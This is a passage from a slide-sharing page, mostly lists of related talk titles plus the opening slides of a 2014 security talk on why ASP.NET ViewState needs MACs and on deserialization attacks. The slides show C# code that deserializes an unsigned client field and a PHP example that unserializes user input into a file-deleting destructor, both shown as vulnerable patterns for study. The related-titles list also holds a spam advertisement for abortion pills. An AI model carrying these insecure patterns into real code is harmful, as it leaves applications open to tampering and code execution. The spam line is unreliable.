Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Super Easy Memory Forensics
Super Easy Memory ForensicsSuper Easy Memory Forensics
Super Easy Memory Forensics
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Security in NodeJS applications
Security in NodeJS applicationsSecurity in NodeJS applications
Security in NodeJS applications
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 

Similaire à Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...SPTechCon
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWAREFIWARE
 
Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...Maarten Balliauw
 
Spring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud FoundrySpring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud FoundryJoshua Long
 
A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom Joshua Long
 
Struts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web ApplicationsStruts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web Applicationselliando dias
 
Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)Visug
 
Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...Maarten Balliauw
 
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)Daniel Bryant
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
GWT Web Socket and data serialization
GWT Web Socket and data serializationGWT Web Socket and data serialization
GWT Web Socket and data serializationGWTcon
 
Adventures in Multithreaded Core Data
Adventures in Multithreaded Core DataAdventures in Multithreaded Core Data
Adventures in Multithreaded Core DataInferis
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebJames Rakich
 
Multi Client Development with Spring
Multi Client Development with SpringMulti Client Development with Spring
Multi Client Development with SpringJoshua Long
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and moreYan Shi
 
Web app and more
Web app and moreWeb app and more
Web app and morefaming su
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVCAlive Kuo
 

Similaire à Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0 (20)

The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
The Magic Revealed: Four Real-World Examples of Using the Client Object Model...
 
Developing your first application using FIWARE
Developing your first application using FIWAREDeveloping your first application using FIWARE
Developing your first application using FIWARE
 
Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...Sherlock Homepage - A detective story about running large web services - WebN...
Sherlock Homepage - A detective story about running large web services - WebN...
 
Spring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud FoundrySpring in the Cloud - using Spring with Cloud Foundry
Spring in the Cloud - using Spring with Cloud Foundry
 
A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom A Walking Tour of (almost) all of Springdom
A Walking Tour of (almost) all of Springdom
 
Struts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web ApplicationsStruts An Open-source Architecture for Web Applications
Struts An Open-source Architecture for Web Applications
 
Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)Sherlock Homepage (Maarten Balliauw)
Sherlock Homepage (Maarten Balliauw)
 
Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...Sherlock Homepage - A detective story about running large web services (VISUG...
Sherlock Homepage - A detective story about running large web services (VISUG...
 
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
MSc Enterprise Systems Development Guest Lecture at UniS (2/12/09)
 
Always on! Or not?
Always on! Or not?Always on! Or not?
Always on! Or not?
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
GWT Web Socket and data serialization
GWT Web Socket and data serializationGWT Web Socket and data serialization
GWT Web Socket and data serialization
 
Adventures in Multithreaded Core Data
Adventures in Multithreaded Core DataAdventures in Multithreaded Core Data
Adventures in Multithreaded Core Data
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Azure and Umbraco CMS
Azure and Umbraco CMSAzure and Umbraco CMS
Azure and Umbraco CMS
 
Everything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the WebEverything is Awesome - Cutting the Corners off the Web
Everything is Awesome - Cutting the Corners off the Web
 
Multi Client Development with Spring
Multi Client Development with SpringMulti Client Development with Spring
Multi Client Development with Spring
 
Web Apps and more
Web Apps and moreWeb Apps and more
Web Apps and more
 
Web app and more
Web app and moreWeb app and more
Web app and more
 
[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC[Coscup 2012] JavascriptMVC
[Coscup 2012] JavascriptMVC
 

Plus de Cyber Security Alliance

Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Cyber Security Alliance
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksCyber Security Alliance
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 

Plus de Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 

Dernier

Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 

Dernier (20)

Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 

Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

  • 1. Application Security Forum - 2014 Western Switzerland 05-06 November 2014 - Y-Parc / Yverdon-les-Bains http://www.appsec-forum.ch Why .NET needs MACs and other serial(-ization) tales Alexandre Herzog CTO / Compass Security Schweiz AG
  • 2. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 2
  • 3. About the tale It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. I won’t cover the disclosure process in detail •Not that I don’t want to, but I don’t have time for it •Feel free to come over and discuss this afterwards –Idéalement autour d’un verre de vin ;-) 3
  • 4. About its storyteller Vaudois exilé d’abord en Valais, then Wellington (New Zealand) und jetzt Zürich Breaking stuff since 2010 for Compass Security •Previously worked for banks as sysadmin / developer Finished my MAS in Information Security in 2013 •MAS thesis about “Crypto-based security mechanisms in Windows and .NET” Author of several security advisories •And still no Twitter handle (!) 4
  • 5. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 5
  • 6. Once upon a time… September 2012, •during a standard ASP.NET web application assessment… <body> <form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> <div> <input type="hidden" […] value="" /> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> </div> 6
  • 7. Once upon a time… September 2012, •during a standard ASP.NET web application assessment… <body> <form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> <div> <input type="hidden" […] value="" /> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> <input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> </div> 7
  • 8. Once upon a time… protected override object LoadPageStateFromPersistenceMedium() { string viewState = Request.Form["__VSTATE"]; byte[] bytes = Convert.FromBase64String(viewState); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Decompress(bytes); LosFormatter formatter = new LosFormatter(); return formatter.Deserialize(Convert.ToBase64String(bytes)); } protected override void SavePageStateToPersistenceMedium(object viewState){ LosFormatter formatter = new LosFormatter(); StringWriter writer = new StringWriter(); formatter.Serialize(writer, viewState); string viewStateString = writer.ToString(); byte[] bytes = Convert.FromBase64String(viewStateString); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Compress(bytes); x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); } 8
  • 9. Once upon a time… protected override object LoadPageStateFromPersistenceMedium() { string viewState = Request.Form["__VSTATE"]; byte[] bytes = Convert.FromBase64String(viewState); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Decompress(bytes); LosFormatter formatter = new LosFormatter(); return formatter.Deserialize(Convert.ToBase64String(bytes)); } protected override void SavePageStateToPersistenceMedium(object viewState){ LosFormatter formatter = new LosFormatter(); StringWriter writer = new StringWriter(); formatter.Serialize(writer, viewState); string viewStateString = writer.ToString(); byte[] bytes = Convert.FromBase64String(viewStateString); if (Helper.obterFlagCompressViewState()) bytes = Compressor.Compress(bytes); x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes)); } 9
  • 10. Once upon a time… We have •A custom implementation of the __VIEWSTATE field •Its value is stored compressed within __VSTATE •It uses the default LosFormatter object constructor •No Machine Authentication (sic) Code (MAC) is used •The __VIEWSTATE field sent to the client is therefore not integrity-protected –Despite the fact we serialize / deserialize objects… The same applies to regular ASP.NET pages •If property EnableViewStateMac is disabled (enabled by default) 10
  • 11. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 11
  • 12. Tales “Why does .NET need MACs” A View State Contains •2 bytes of header data (ASP.NET 1.1 versus 2.0+) •A tree of serialized objects (View State Bag & Serialized ASP.NET controls of the page) •A (H)MAC ensuring integrity (if configured so – default: enabled) A View State •Can be encrypted •Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields) •Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property) 12
  • 13. Tales “Why does .NET need MACs” View State handling and lifecycle 13 ASP.NET deserializes the View State and copies the values back into the controls Serialize Deserialize Request from the client comes in Response is sent to the client
  • 14. Tales “Why does .NET need MACs” State of the art of hacking View States back then: Trustwave's SpiderLabs Security Advisory TWSL2010-001: Multiplatform View State Tampering Vulnerabilities Published: 2010-02-08 Version: 1.1 SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 14
  • 15. 15
  • 16. Tales “Why does .NET need MACs” Inappropriate Microsoft advice back then (Trustwave): 16
  • 17. Tales “Why does .NET need MACs” State of the art of exploiting ASP.NET View State fields without MACs: •Abuse them for XSS •You must have an existing control on the page accepting HTML to inject your payload Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language •Implemented in their “Deface” tool •This attack was presented in MISC magazine #69 17
  • 18. Tales “Why does .NET need MACs” Back to September 2012: so ASP.NET unprotected View State fields can be misused •But “only” for XSS when a few pre-conditions are met •And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) Some pages in e.g. SharePoint do not enforce a MAC on the View State •View State on these pages is empty, so you can’t misused them for XSS 18
  • 19. Agenda About the tale and its storyteller Once upon a time… Tales “Why does .NET need MACs” “Serialization” tales When the stories come together – my tale Time sequence of the (patch) battle Is the ugly bug really dead? Happy end (?) 19
  • 20. “Serialization” tales Serialization is known to be an issue in web apps •Potentially user defined content gets deserialized on the server •Depends on the technology and the application’s code •Tool “Deface” targets Apache MyFaces 1.2.8 applications Let’s see a PHP example: 20
  • 21. “Serialization” tales class Example1 { public $cache_file; function __construct() { // some PHP code... } function __destruct() { $file = "/var/www/cache/tmp/{$this->cache_file}"; if (file_exists($file)) @unlink($file); } } // some PHP code... $user_data = unserialize($_GET['data']); // some PHP code... 21
